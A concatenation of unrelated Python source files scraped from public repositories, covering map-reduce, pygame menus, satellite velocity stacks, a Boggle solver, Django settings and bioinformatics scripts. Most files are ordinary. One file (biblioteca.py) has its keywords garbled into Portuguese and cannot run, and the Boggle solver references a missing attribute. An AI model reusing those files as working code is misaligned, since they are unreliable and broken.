func.route_rule = ('regex_commands', (cmd, regex))
return func
return decorator
| 3.515625
| 4
|
MCS/mapred/combiner.py
|
Wiki-fan/MIPT-all
| 0
|
12775597
|
<filename>MCS/mapred/combiner.py
#!/usr/bin/env python3
import sys
inside = 0
total = 0
for line in sys.stdin:
arr = line.strip().split(' ')
x, y = float(arr[0]), float(arr[1])
print(x, y, file=sys.stderr)
total += 1
if x**2+y**2<=1:
inside += 1
print('Combiner output %.15f'%(inside/total*4), file=sys.stderr)
print("%.15f"%(inside/total*4))
| 2.40625
| 2
|
sp_mp.py
|
NikhilMunna/chinese-checkers-
| 2
|
12775598
|
import pygame, time
import virtual_start_page
import two_players
def CreateGameWindow(width, height):
pygame.display.set_caption("Checkers !")
gamewindow = pygame.display.set_mode((width, height))
return gamewindow
def WriteText(text, text_pos_x, text_pos_y, text_size):
text_font = pygame.font.SysFont(None, text_size)
text_render = text_font.render(text, True, Black)
gameWindow.blit(text_render, (text_pos_x, text_pos_y))
class CreateButton():
def layout(self,button):
pygame.draw.rect(gameWindow, button[4], (button[0], button[1], button[2], button[3]))
def text(self, button, space_x, space_y):
WriteText(button[5], button[0] + space_x, button[1] + space_y, button[6])
def Animate(self, button, actual_color, animate_color):
mouse_x, mouse_y = pygame.mouse.get_pos()
if mouse_x >= button[0] and mouse_y >= button[1] and mouse_x <= button[0] + button[2] and mouse_y <= button[1] + button[3]:
button[7] += 1
if button[7] == 1:
button[6] += 1
button[4] = animate_color
else:
button[4] = actual_color
button[6] = 30
button[7] = 0
pygame.init()
#Colors:
White = (255,255,255)
LightWhite = (200,200,200)
Black = (0,0,0)
Gray = (128,128,128)
LightGreen = (0,200,0)
BrightGreen = (0,255,0)
LightBlue = (0,0,200)
BrightBlue = (0,0,255)
#Dimensions:
gameWindow_width = 680
gameWindow_height = 680
#-------------Lists of properties of Buttons------
twoPlayers = [gameWindow_width/4 - 60, gameWindow_height/3 + 60 , 200, 50, LightGreen, "Two Players", 30, 0]
team_play = [gameWindow_width/4 + 270 - 80, gameWindow_height/3 + 60, 200, 50, LightGreen, "Team Play", 30, 0]
back = [10, gameWindow_height - 80, 160, 50, Black, "Back", 30, 0]
gameWindow = CreateGameWindow(gameWindow_width, gameWindow_height)
#pygame.display.set_caption("Checkers")
#gameWindow = pygame.display.set_mode((gameWindow_width,gameWindow_height))
def Run_Game():
End = False
while not End:
gameWindow.fill(LightWhite)
WriteText("PLAY", 210, 100, 150)
createButton = CreateButton()
createButton.layout(twoPlayers)
createButton.text(twoPlayers, 36, 16)
createButton.Animate(twoPlayers, LightGreen, BrightGreen)
createButton.layout(team_play)
createButton.text(team_play, 45, 16)
createButton.Animate(team_play, LightGreen, BrightGreen)
createButton.layout(back)
createButton.text(back, 55, 16)
createButton.Animate(back, LightWhite, Gray)
#On_Click_Back_Button(back)
for key in pygame.event.get():
if key.type == pygame.KEYDOWN:
if key.key == pygame.K_ESCAPE:
End = True
pygame.quit()
if key.type == pygame.QUIT:
pygame.quit()
mouse_x, mouse_y = pygame.mouse.get_pos()
if key.type == pygame.MOUSEBUTTONDOWN:
if mouse_x >= back[0] and mouse_y >= back[1] and mouse_x <= back[0] + back[2] and mouse_y <= back[1] + back[3]:
return
if mouse_x >= twoPlayers[0] and mouse_y >= twoPlayers[1] and mouse_x <= twoPlayers[0] + twoPlayers[2] \
and mouse_y <= twoPlayers[1] + twoPlayers[3]:
two_players.StartSinglePlayer(0, 0, 0)
pygame.display.update()
#Run_Game()
#pygame.quit()
| 2.921875
| 3
|
main/customtrainer.py
|
safdark/behavioral-cloning
| 0
|
12775599
|
'''
Created on Dec 11, 2016
@author: safdar
'''
import basetrainer
class MyClass(basetrainer):
'''
classdocs
'''
def __init__(self, params):
'''
Constructor
'''
| 2.78125
| 3
|
dkr-py310/docker-student-portal-310/course_files/begin_advanced/py_files_5.py
|
pbarton666/virtual_classroom
| 0
|
12775600
|
<reponame>pbarton666/virtual_classroom
#py_files_5.py
import pickle as pickle
from junk import JUNK
pickle_file="dill"
#make a couple objects
obj = [ [1, 2, 3],
[4, 5, 5],
[7, 8, 9]
]
obj1="<NAME>"
obj2=set([33,43,53])
#another (better) way:
to_pickle={'obj' : obj,
'obj1': obj1,
'obj2': obj2,
'junk': JUNK
}
with open(pickle_file, 'wb') as f:
pickle.dump(to_pickle,f)
to_pickle=None
with open(pickle_file, 'rb') as f:
to_pickle=pickle.load(f)
for k, v in to_pickle.items():
print(k,v)
| 3.203125
| 3
|
prepStack-EHU.py
|
bryanvriel/Gld-timeseries
| 0
|
12775601
|
<gh_stars>0
#!/usr/bin/env python3
import numpy as np
# import matplotlib.pyplot as plt
from scipy.ndimage.interpolation import map_coordinates
from sklearn.linear_model import RANSACRegressor
import datetime
from tqdm import tqdm
import glob
import gdal
import h5py
import sys
import os
def main():
# Traverse data path
dpath = '/home/ehultee/data/nsidc0481_MEASURES_greenland_V01/Ecoast-66.50N'
dates = []
vx_files = []; vy_files = []
ex_files = []; ey_files = []
for root, dirs, files in os.walk(dpath):
for fname in files:
if not fname.endswith('v1.2.meta'):
continue
# Get the dates for the igram pair
first_date, second_date, nominal_dt = parseMeta(os.path.join(root, fname))
# Compute middle date
dt = 0.5 * (second_date - first_date).total_seconds()
mid_date = first_date + datetime.timedelta(seconds=dt)
mid_date += datetime.timedelta(seconds=nominal_dt)
dates.append(mid_date)
# Find the data files
vx_file = glob.glob(os.path.join(root, '*vx*.tif'))[0]
vy_file = glob.glob(os.path.join(root, '*vy*.tif'))[0]
ex_file = glob.glob(os.path.join(root, '*ex*.tif'))[0]
ey_file = glob.glob(os.path.join(root, '*ey*.tif'))[0]
# Append the filenames
vx_files.append(vx_file)
vy_files.append(vy_file)
ex_files.append(ex_file)
ey_files.append(ey_file)
# Create array for dates and files
dates = np.array(dates)
N_dates = len(dates)
vx_files = np.array(vx_files, dtype='S')
vy_files = np.array(vy_files, dtype='S')
ex_files = np.array(ex_files, dtype='S')
ey_files = np.array(ey_files, dtype='S')
# Construct array of decimal year
tdec = np.zeros(N_dates)
for i in tqdm(range(N_dates)):
date = dates[i]
year_start = datetime.datetime(date.year, 1, 1)
if date.year % 4 == 0:
ndays = 366.0
else:
ndays = 365.0
tdec[i] = date.year + (date - year_start).total_seconds() / (ndays * 86400.0)
# Sort the dates and files
indsort = np.argsort(tdec)
tdec = tdec[indsort]
vx_files = vx_files[indsort]
vy_files = vy_files[indsort]
ex_files = ex_files[indsort]
ey_files = ey_files[indsort]
# Read first file to get dimensions and geo transform
ds = gdal.Open(vx_files[0], gdal.GA_ReadOnly)
Ny, Nx = ds.RasterYSize, ds.RasterXSize
x_start, dx, _, y_start, _, dy = ds.GetGeoTransform()
ds = None
# Get DEM
# dem = load_interpolated_dem()
# Allocate arrays for velocities and errors
vx = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
vy = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
ex = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
ey = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
heading = np.zeros(N_dates)
counts = np.zeros((Ny, Nx))
# Loop over rasters
for i in tqdm(range(len(vx_files))):
# Load vx
ds = gdal.Open(vx_files[i], gdal.GA_ReadOnly)
vx_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Load vy
ds = gdal.Open(vy_files[i], gdal.GA_ReadOnly)
vy_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Load vx
ds = gdal.Open(ex_files[i], gdal.GA_ReadOnly)
ex_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Load vy
ds = gdal.Open(ey_files[i], gdal.GA_ReadOnly)
ey_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Compute heading
try:
heading[i] = compute_heading(vx_dat, skip=15)
except ValueError:
heading[i] = np.nan
continue
# Mask out bad values
mask = (np.abs(vx_dat) > 1e6) + (ex_dat < 0.0) + (ex_dat > 100.0)
vx_dat[mask] = np.nan
vy_dat[mask] = np.nan
ex_dat[mask] = np.nan
ey_dat[mask] = np.nan
# Scale and save
vx[i,:,:] = 1.0e-3 * vx_dat
vy[i,:,:] = 1.0e-3 * vy_dat
ex[i,:,:] = 1.0e-3 * ex_dat
ey[i,:,:] = 1.0e-3 * ey_dat
# Update counters
counts[np.invert(mask)] += 1
# Only keep good headings
mask = np.isfinite(heading)
vx, vy, ex, ey = vx[mask], vy[mask], ex[mask], ey[mask]
heading = heading[mask]
tdec = tdec[mask]
vx_files = vx_files[mask]
vy_files = vy_files[mask]
ex_files = ex_files[mask]
ey_files = ey_files[mask]
N_dates = len(heading)
# Create arrays for coordinates
x = x_start + dx * np.arange(Nx)
y = y_start + dy * np.arange(Ny)
X, Y = np.meshgrid(x, y)
# Initialize stack directory
if not os.path.isdir('Stack'):
os.mkdir('Stack')
# Convert errors into weights
wx = 1.0 / (25.0 * np.sqrt(ex))
wy = 1.0 / (25.0 * np.sqrt(ey))
del ex, ey
# Spatially subset
islice = slice(120, 580)
jslice = slice(240, 878)
vx = vx[:,islice,jslice]
vy = vy[:,islice,jslice]
wx = wx[:,islice,jslice]
wy = wy[:,islice,jslice]
# dem = dem[islice,jslice]
X = X[islice,jslice]
Y = Y[islice,jslice]
Ny, Nx = X.shape
# Create stack for Vx data
with h5py.File('Stack/vx.h5', 'w') as fid:
chunks = (1, 128, 128)
fid.create_dataset('igram', (N_dates, Ny, Nx), dtype='f', data=vx, chunks=chunks)
fid.create_dataset('weights', (N_dates, Ny, Nx), dtype='f', data=wx, chunks=chunks)
fid['tdec'] = tdec
fid['x'] = X
fid['y'] = Y
# fid['z'] = dem
fid['chunk_shape'] = list(chunks)
fid['vx_files'] = vx_files
fid['vy_files'] = vy_files
fid['heading'] = heading
# Create stack for Vy data
with h5py.File('Stack/vy.h5', 'w') as fid:
chunks = (1, 128, 128)
fid.create_dataset('igram', (N_dates, Ny, Nx), dtype='f', data=vy, chunks=chunks)
fid.create_dataset('weights', (N_dates, Ny, Nx), dtype='f', data=wy, chunks=chunks)
fid['tdec'] = tdec
fid['x'] = X
fid['y'] = Y
# fid['z'] = dem
fid['chunk_shape'] = list(chunks)
fid['vx_files'] = vx_files
fid['vy_files'] = vy_files
fid['heading'] = heading
def parseMeta(filename):
"""
Parse the metadata for dates.
"""
with open(filename, 'r') as fid:
for line in fid:
if line.startswith('First Image Date'):
dstr = line.strip().split('=')[-1].strip()
first_date = datetime.datetime.strptime(dstr, '%b:%d:%Y')
elif line.startswith('Second Image Date'):
dstr = line.strip().split('=')[-1].strip()
second_date = datetime.datetime.strptime(dstr, '%b:%d:%Y')
elif line.startswith('Product Center Latitude'):
vstr = line.strip().split('=')[-1].strip()
clat = float(vstr)
elif line.startswith('Product Center Longitude'):
vstr = line.strip().split('=')[-1].strip()
clon = float(vstr)
elif line.startswith('Nominal Time'):
tstr = line.strip().split('=')[-1].strip()
hh, mm, ss = [int(val) for val in tstr.split(':')]
nominal_dt = hh * 3600.0 + mm * 60.0 + ss
return first_date, second_date, nominal_dt
# def load_interpolated_dem():
#
# # Get hdr information from random velocity tif file
# vhdr = load_gdal('/data0/briel/measures/nsidc0481_MEASURES_greenland_V01/Wcoast-69.10N/TSX_Sep-11-2012_Sep-22-2012_20-41-24/TSX_W69.10N_11Sep12_22Sep12_20-41-24_ex_v1.2.tif', hdr_only=True)
#
# # Load DEM
# dem, dhdr = load_gdal('arcticdem_crop.dem')
#
# # Velocity grid meshgrid coordinates
# x = vhdr.x0 + vhdr.dx * np.arange(vhdr.nx)
# y = vhdr.y0 + vhdr.dy * np.arange(vhdr.ny)
# X, Y = np.meshgrid(x, y)
#
# # Interpolate DEM to velocity grid
# dem = interpolate_raster(dem, dhdr, X.ravel(), Y.ravel())
# dem = dem.reshape(vhdr.ny, vhdr.nx)
# return dem
def load_gdal(filename, hdr_only=False):
hdr = GenericClass()
dset = gdal.Open(filename, gdal.GA_ReadOnly)
hdr.x0, hdr.dx, _, hdr.y0, _, hdr.dy = dset.GetGeoTransform()
hdr.ny = dset.RasterYSize
hdr.nx = dset.RasterXSize
if hdr_only:
return hdr
else:
d = dset.GetRasterBand(1).ReadAsArray()
return d, hdr
def interpolate_raster(data, hdr, x, y):
row = (y - hdr.y0) / hdr.dy
col = (x - hdr.x0) / hdr.dx
coords = np.vstack((row, col))
values = map_coordinates(data, coords, order=3, prefilter=False)
return values
def compute_heading(v, skip=10):
dy = -100.0
dx = 100.0
ny, nx = v.shape
# Get left edge
ycoords = dy * np.arange(0, ny, skip)
xcoords = np.full(ycoords.shape, np.nan)
for cnt, i in enumerate(range(0, ny, skip)):
good_ind = (v[i,:] > -20000).nonzero()[0]
if len(good_ind) < 10:
continue
xcoords[cnt] = dx * good_ind[-1]
# Solve linear
mask = np.isfinite(xcoords)
ycoords, xcoords = ycoords[mask], xcoords[mask]
X = np.column_stack((ycoords, np.ones_like(ycoords)))
solver = RANSACRegressor().fit(X, xcoords)
fit = solver.predict(X)
# Compute heading
slope = solver.estimator_.coef_[0]
heading = np.degrees(np.arctan(slope))
return heading
class GenericClass:
pass
if __name__ == '__main__':
main()
# end of file
| 2.171875
| 2
|
strings/boggle.py
|
santoshmano/pybricks
| 0
|
12775602
|
class TrieNode():
def __init__(self, letter=''):
self.children = {}
self.is_word = False
def lookup_letter(self, c):
if c in self.children:
return True, self.children[c].is_word
else:
return False, False
class Trie():
def __init__(self):
self.root = TrieNode()
def add(self, word):
cur = self.root
for letter in word:
if letter not in cur.children:
cur.children[letter] = TrieNode()
cur = cur.children[letter]
cur.is_word = True
def lookup(self, word):
cur = self.root
for letter in word:
if letter not in cur.children:
return []
cur = cur.children[letter]
if cur.is_word:
return cur.index
else:
return []
def build_prefix(dictionary):
trie = Trie()
for word in dictionary:
trie.add(word)
return trie
def find_words(dictionary, board):
result = []
prefix = build_prefix(dictionary)
boggle(board, prefix, result)
return result
def boggle(board, prefix, result):
#print(board, len(board[0]), len(board))
visited = [[False for _ in range(len(board[0]))] for _ in range(len(board))]
for r in range(0, len(board)):
for c in range(0, len(board[0])):
str = []
_boggle(board, visited, prefix.root, result, r, c, str)
def _is_valid(visited, i, j):
if (i < 0) or (i >= len(visited)) or \
(j < 0) or (j >= len(visited[0])) or \
visited[i][j] == True:
return False
return True
def _boggle(board, visited, node, result, row, col, str):
print(node.children)
print(visited)
c = board[row][col]
present, is_word = node.lookup_letter(c)
if present == False:
return
str.append(c)
if is_word == True :
result.append("".join(str))
print(result)
visited[row][col] = True
for i in row-1, row, row+1:
for j in col-1, col, col+1:
if _is_valid(visited, i, j):
_boggle(board, visited, node.children[c], result, i, j, str)
str.pop()
visited[row][col] = False
dictionary = ["geek", "geeks", "boy"]
board = [["g", "b", "o"],
["e", "y", "s"],
["s", "e", "k"]]
res = find_words(dictionary, board)
| 3.9375
| 4
|
weightin/apps/app.py
|
thomasLensicaen/weightin
| 0
|
12775603
|
<reponame>thomasLensicaen/weightin<filename>weightin/apps/app.py
import pymongo
from config import DbConfig
import logging
from common.logtool import log_debug, create_logger
class AppBase:
db_name = "appbase"
collections_list = ["appbase"]
def __init__(self, dbconfig: DbConfig):
self.dbconfig = dbconfig
self.mongo_client = pymongo.MongoClient(dbconfig.host, dbconfig.port)
server_info = self.mongo_client.server_info()
self.db = self.mongo_client[self.db_name]
self.collections = dict()
for col_name in self.collections_list:
self.collections[col_name] = self.db[col_name]
print(self.mongo_client.list_database_names())
if not self.db_name in self.mongo_client.list_database_names():
logging.info("{} Database is not created inside MongoDb, maybe no content has been pushed yet".format(self.db_name))
| 2.546875
| 3
|
apps/notifications/conf.py
|
sotkonstantinidis/testcircle
| 3
|
12775604
|
<reponame>sotkonstantinidis/testcircle
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
from django.conf import settings # noqa
from appconf import AppConf
class NotificationsConf(AppConf):
CREATE = 1
DELETE = 2
CHANGE_STATUS = 3
ADD_MEMBER = 4
REMOVE_MEMBER = 5
EDIT_CONTENT = 6
FINISH_EDITING = 7
ACTIONS = (
(CREATE, _('created questionnaire')),
(DELETE, _('deleted questionnaire')),
(CHANGE_STATUS, _('changed status')),
(ADD_MEMBER, _('invited member')),
(REMOVE_MEMBER, _('removed member')),
(EDIT_CONTENT, _('edited content')),
(FINISH_EDITING, _('editor finished'))
)
ACTION_ICON = {
CREATE: 'icon-plus',
DELETE: 'icon-minus',
'status-reject': 'icon-rewind',
'status-approve': 'icon-forward',
ADD_MEMBER: 'icon-member-add',
REMOVE_MEMBER: 'icon-member-remove',
EDIT_CONTENT: 'icon-pencil',
FINISH_EDITING: 'icon-edit-approve',
}
MAIL_SUBJECTS = {
'edited': _('This practice has been edited'),
'submitted': _('This practice has been submitted'),
'reviewed': _('This practice has been approved and is awaiting final review before it can be published'),
'published': _('Congratulations, this practice has been published!'),
'deleted': _('This practice has been deleted'),
'rejected_submitted': _('This practice has been rejected and needs revision'),
'rejected_reviewed': _('This practice has been rejected and needs revision'),
'compiler_added': _('You are a compiler'),
'compiler_removed': _('You have been removed as a compiler'),
'editor_added': _('You are an editor'),
'editor_removed': _('You have been removed as an editor'),
'reviewer_added': _('You are a reviewer'),
'reviewer_removed': _('You have been removed as a reviewer'),
'publisher_added': _('You are a publisher'),
'publisher_removed': _('You have been removed as a publisher'),
}
# Mapping of user permissions and allowed questionnaire statuses
QUESTIONNAIRE_STATUS_PERMISSIONS = {
'questionnaire.submit_questionnaire': settings.QUESTIONNAIRE_DRAFT,
'questionnaire.review_questionnaire': settings.QUESTIONNAIRE_SUBMITTED,
'questionnaire.publish_questionnaire': settings.QUESTIONNAIRE_REVIEWED
}
QUESTIONNAIRE_MEMBERSHIP_PERMISSIONS = {
settings.QUESTIONNAIRE_COMPILER: [settings.QUESTIONNAIRE_DRAFT],
settings.QUESTIONNAIRE_EDITOR: [],
settings.QUESTIONNAIRE_REVIEWER: [settings.QUESTIONNAIRE_SUBMITTED],
settings.QUESTIONNAIRE_PUBLISHER: [settings.QUESTIONNAIRE_REVIEWED],
settings.QUESTIONNAIRE_SECRETARIAT: [settings.QUESTIONNAIRE_SUBMITTED, settings.QUESTIONNAIRE_REVIEWED],
settings.ACCOUNTS_UNCCD_ROLE_NAME: [],
settings.QUESTIONNAIRE_LANDUSER: [],
settings.QUESTIONNAIRE_RESOURCEPERSON: []
}
# All actions that should be listed on 'my slm data' -> notifications.
# Some actions are depending on the role (i.e. compilers see all edits).
USER_PROFILE_ACTIONS = [
CREATE, DELETE, CHANGE_STATUS, ADD_MEMBER, REMOVE_MEMBER, FINISH_EDITING
]
# All actions that should trigger an email
EMAIL_PREFERENCES = [
CREATE, DELETE, CHANGE_STATUS, ADD_MEMBER, REMOVE_MEMBER, FINISH_EDITING
]
# email subscriptions
NO_MAILS = 'none'
TODO_MAILS = 'todo'
ALL_MAILS = 'all'
EMAIL_SUBSCRIPTIONS = (
(NO_MAILS, _('No emails at all')),
(TODO_MAILS, _('Only emails that I need to work on')),
(ALL_MAILS, _('All emails')),
)
TEASER_PAGINATE_BY = 5
LIST_PAGINATE_BY = 10
SALT = settings.BASE_DIR
| 1.859375
| 2
|
text_cryptography/tests/log.py
|
Joshua-Booth/text-cryptography
| 0
|
12775605
|
<gh_stars>0
import logging
# Create a logger called 'Tester'
test_logger = logging.getLogger('Tester')
test_logger.setLevel(logging.DEBUG)
# Create a file handler which logs even debug messages
file_handler = logging.FileHandler('test.log')
file_handler.setLevel(logging.DEBUG)
# Create a console handler with a higher log level
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.ERROR)
# Create a formatter and add it to the handler
formatter_format = "%(asctime)s - %(name)s - %(levelname)s - " + \
"%(funcName)s - Line: %(lineno)s - %(message)s"
formatter = logging.Formatter(formatter_format)
file_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
# Add the handlers to the logger
test_logger.addHandler(file_handler)
test_logger.addHandler(console_handler)
| 3.09375
| 3
|
Python/Udemy/biblioteca.py
|
ccpn1988/Python
| 0
|
12775606
|
<filename>Python/Udemy/biblioteca.py
importar os
importar tkinter como tk
root = tk.Tk ()
canvas1 = tk.Canvas (root, width = 300, height = 350, bg = 'lightsteelblue2', relief = 'elevado')
canvas1.pack ()
label1 = tk.Label (root, text = 'Atualizar PIP', bg = 'lightsteelblue2')
label1.config (font = ('helvetica', 20))
canvas1.create_window (150, 80, janela = rótulo1)
def upgradePIP ():
os.system ('start cmd / k python.exe -m pip install --upgrade pip')
button1 = tk.Button (text = 'Upgrade PIP', command = upgradePIP, bg = 'green', fg = 'white', font = ('helvetica', 12, 'bold'))
canvas1.create_window (150, 180, janela = botão1)
root.mainloop ()
| 3.671875
| 4
|
calculate_mupots_integrate.py
|
3dpose/3D-Multi-Person-Pose
| 91
|
12775607
|
import os
import torch
import pickle
import numpy as np
from lib import inteutil
from lib import posematcher
from lib.models import networkinte
from tqdm import tqdm
from TorchSUL import Model as M
from collections import defaultdict
if __name__=='__main__':
## step 1: match the poses
print('Matching poses from two branches...')
matcher = posematcher.PoseMatcher(top_down_path='./mupots/pred/',
btm_up_path='./mupots/MUPOTS_Preds_btmup_transformed.pkl')
matcher.match(pts_out_path='./mupots/pred_bu/', dep_out_path='./mupots/pred_dep_bu/',
gt_dep_path='./mupots/depths/')
## step 2: infer the integrated results
print('Inferring the integrated poses...')
# create data loader
data = inteutil.InteDataset(bu_path='./mupots/pred_bu/', bu_dep_path='./mupots/pred_dep_bu/',
td_path='./mupots/pred/', td_dep_path='./mupots/pred_dep/')
# initialize the network
net = networkinte.IntegrationNet()
pts_dumb = torch.zeros(2, 102)
dep_dumb = torch.zeros(2, 2)
net(pts_dumb, dep_dumb)
M.Saver(net).restore('./ckpts/model_inte/')
net.cuda()
# create paths
if not os.path.exists('./mupots/pred_inte/'):
os.makedirs('./mupots/pred_inte/')
if not os.path.exists('./mupots/pred_dep_inte/'):
os.makedirs('./mupots/pred_dep_inte/')
with torch.no_grad():
all_pts = defaultdict(list)
for src_pts,src_dep,vid_inst in tqdm(data):
src_pts = torch.from_numpy(src_pts).cuda()
src_dep = torch.from_numpy(src_dep).cuda()
res_pts, res_dep = net(src_pts, src_dep)
res_pts = res_pts.cpu().numpy()
res_dep = res_dep.squeeze().cpu().numpy() * 1000 # the depth is scaled 1000
# save results
i,j = vid_inst
all_pts[i].insert(j, res_pts)
pickle.dump(res_dep, open('./mupots/pred_dep_inte/%02d_%02d.pkl'%(i,j), 'wb'))
for k in all_pts:
result = np.stack(all_pts[k], axis=1)
pickle.dump(result, open('./mupots/pred_inte/%d.pkl'%(k+1), 'wb'))
| 2.140625
| 2
|
python/split_scATAC_bam_by_cluster.py
|
crazyhottommy/scATACtools
| 4
|
12775608
|
<gh_stars>1-10
#! /usr/bin/env python3
import pysam
import csv
import argparse
import os.path
import sys
parser = argparse.ArgumentParser()
parser.add_argument("csv", help="Required. the FULL path to the cluster csv file with header, \
first column is the cell barcode, second column is the cluster id")
parser.add_argument("bam", help="Required. the FULL path to the 10x scATAC bam file generated \
by cellranger-atac count")
parser.add_argument("-prefix", help="Optional, the prefix of the output bam, default is cluster_id.bam")
parser.add_argument("-outdir", help="Optional, the output directory for the splitted bams, default is current dir")
args = parser.parse_args()
if os.path.exists(args.csv):
pass
else:
print("csv file is not found")
sys.exit(1)
if os.path.exists(args.bam):
pass
else:
print("10x scATAC bam not found")
sys.exit(1)
if args.outdir:
if os.path.isdir(args.outdir):
pass
else:
try:
os.mkdir(args.outdir)
except OSError:
print("can not create directory {}".format(args.outdir))
cluster_dict = {}
with open(args.csv) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
#skip header
header = next(csv_reader)
for row in csv_reader:
cluster_dict[row[0]] = row[1]
clusters = set(x for x in cluster_dict.values())
fin = pysam.AlignmentFile(args.bam, "rb")
# open the number of bam files as the same number of clusters, and map the out file handler to the cluster id, write to a bam with wb
fouts_dict = {}
for cluster in clusters:
if args.prefix:
fout_name = args.prefix + "_cluster_" + cluster + ".bam"
else:
fout_name = "cluster_" + cluster + ".bam"
if args.outdir:
fout = pysam.AlignmentFile(os.path.join(args.outdir,fout_name), "wb", template = fin)
else:
fout = pysam.AlignmentFile(fout_name, "wb", template = fin)
fouts_dict[cluster] = fout
for read in fin:
tags = read.tags
# the 8th item is the CB tag
CB_list = [ x for x in tags if x[0] == "CB"]
if CB_list:
cell_barcode = CB_list[0][1]
else:
continue
# the bam files may contain reads not in the final clustered barcodes
# will be None if the barcode is not in the clusters.csv file
cluster_id = cluster_dict.get(cell_barcode)
if cluster_id:
fouts_dict[cluster_id].write(read)
## do not forget to close the files
fin.close()
for fout in fouts_dict.values():
fout.close()
| 2.78125
| 3
|
test/testattributenames.py
|
mvz/vb2py
| 2
|
12775609
|
<gh_stars>1-10
#
# Turn off logging in extensions (too loud!)
import vb2py.extensions
import unittest
vb2py.extensions.disableLogging()
import vb2py.vbparser
vb2py.vbparser.log.setLevel(0) # Don't print all logging stuff
from vb2py.plugins.attributenames import TranslateAttributes
class TestAttributeNames(unittest.TestCase):
def setUp(self):
"""Setup the tests"""
self.p = TranslateAttributes()
# << Tests >>
def testAll(self):
"""Do some tests on the attribute"""
names =(("Text", "text"),
("Visible", "visible"),)
for attribute, replaced in names:
for pattern in ("a.%s=b", ".%s=b", "b=a.%s", "b=.%s",
"a.%s.b=c", ".%s.c=b", "b=a.%s.c", "b=.%s.c",
"a.%s.b+10=c", ".%s.c+10=b", "b=a.%s.c+10", "b=.%s.c+10",):
test = pattern % attribute
new = self.p.postProcessPythonText(test)
self.assertEqual(new, pattern % replaced)
for attribute, replaced in names:
for pattern in ("a.%slkjlk=b", ".%slkjlk=b", "b=a.%slkjl", "b=.%slkjl",
"a.%slkj.b=c", ".%slkj.c=b", "b=a.%slkj.c", "b=.%slkj.c",
"a.%slkj.b+10=c", ".%slkj.c+10=b", "b=a.%slkj.c+10", "b=.%slkj.c+10",):
test = pattern % attribute
new = self.p.postProcessPythonText(test)
self.assertNotEqual(new, pattern % replaced)
# -- end -- << Tests >>
if __name__ == "__main__":
unittest.main()
| 2.171875
| 2
|
menus/admin.py
|
sgr-smile2015/website
| 1
|
12775610
|
from django.contrib import admin
from .models import ResItem
admin.site.register(ResItem)
| 1.234375
| 1
|
tests/__init__.py
|
luisparravicini/ioapi
| 0
|
12775611
|
import os
import sys
sys.path.append(os.path.join(os.getcwd(), '..'))
| 1.648438
| 2
|
p053e/max_subarray.py
|
l33tdaima/l33tdaima
| 1
|
12775612
|
from typing import List
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
ans, dp = nums[0], 0
for n in nums:
dp = max(dp + n, n)
ans = max(ans, dp)
return ans
# TESTS
tests = [
([-1], -1),
([-2, 1, -3], 1),
([-2, -1, -3], -1),
([-2, 1, -3, 4], 4),
([-2, 1, -3, 4, -1, 2, 1, -5, 4], 6),
]
for t in tests:
sol = Solution()
act = sol.maxSubArray(t[0])
print("Largest sum of subarray in", t, "->", act)
assert act == t[1]
| 3.5
| 4
|
secao4_TiposVariaveis/TipoBooleano.py
|
PauloFTeixeira/curso_python
| 0
|
12775613
|
<reponame>PauloFTeixeira/curso_python<filename>secao4_TiposVariaveis/TipoBooleano.py
"""
São duas constantes, VERDADEIRO ou FALSO
TRUE: Verdadeiro
FALSE: Falso
OBS.: Sempre começa com Maiuscula
OPERAÇÕES BASICAS
#NEGAÇÃO (not): Sé verdadeiro é falso e se falso é verdadeiro. SEMPRE AO CONTRARIO
Ex.: usr=True
print(not usr) -> False
#(or): Operação binária, depende de dois valores, UM OU OUTRO DEVEM SER VERDADEIROS
Ex.: True or True -> True
True or False -> True
False or True -> True
False or False -> False
#(and) Operação binária, depende de dois valores. AMBOS DEVEM SER VERDADEIROS
Ex.: True and True -> True
True and False -> False
False and True -> False
False and False -> False
"""
| 2.703125
| 3
|
mediafeed/databases/utils.py
|
media-feed/mediafeed
| 0
|
12775614
|
<reponame>media-feed/mediafeed
from logging import getLogger
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from ..settings import DATABASE_URL
logger = getLogger('mediafeed.databases')
Base = declarative_base()
engine = create_engine(DATABASE_URL)
Session = sessionmaker(bind=engine)
def initdb():
logger.info('Criando base de dados')
Base.metadata.create_all(engine, checkfirst=True)
| 2.078125
| 2
|
src/bioregistry/external/prefixcommons.py
|
Adafede/bioregistry
| 17
|
12775615
|
<reponame>Adafede/bioregistry
# -*- coding: utf-8 -*-
"""Download registry information from the Life Science Registry (LSR), which powers Prefix Commons.
.. seealso::
- http://tinyurl.com/lsregistry which should expand to
https://docs.google.com/spreadsheets/d/1cDGJcRteb9F5-jbw7Q7np0kk4hfWhdBHNYRIg3LXDrs/edit#gid=0
"""
import json
from typing import Any, Dict
from pystow.utils import download
from bioregistry.constants import EXTERNAL
__all__ = [
"get_prefixcommons",
]
DIRECTORY = EXTERNAL / "prefixcommons"
DIRECTORY.mkdir(exist_ok=True, parents=True)
RAW_PATH = DIRECTORY / "raw.tsv"
PROCESSED_PATH = DIRECTORY / "processed.json"
GOOGLE_DOCUMENT_ID = "1c4DmQqTGS4ZvJU_Oq2MFnLk-3UUND6pWhuMoP8jgZhg"
URL = f"https://docs.google.com/spreadsheets/d/{GOOGLE_DOCUMENT_ID}/export?format=tsv&gid=0"
COLUMNS = [
"prefix", # "Preferred Prefix",
"Alt-prefix",
"Provider Base URI",
"Alternative Base URI",
"MIRIAM",
"BiodbcoreID",
"bioportal", # "BioPortal Ontology ID",
"miriam", # "identifiers.org",
"Abbreviation",
"name", # originally: Title,
"description", # "Description",
"pubmed_ids", # "PubMed ID"
"Organization",
"Type (warehouse, dataset or terminology)",
"keywords",
"homepage", # "Homepage",
"Functional?",
"sub-namespace in dataset",
"part of collection",
"License URL",
"License Text",
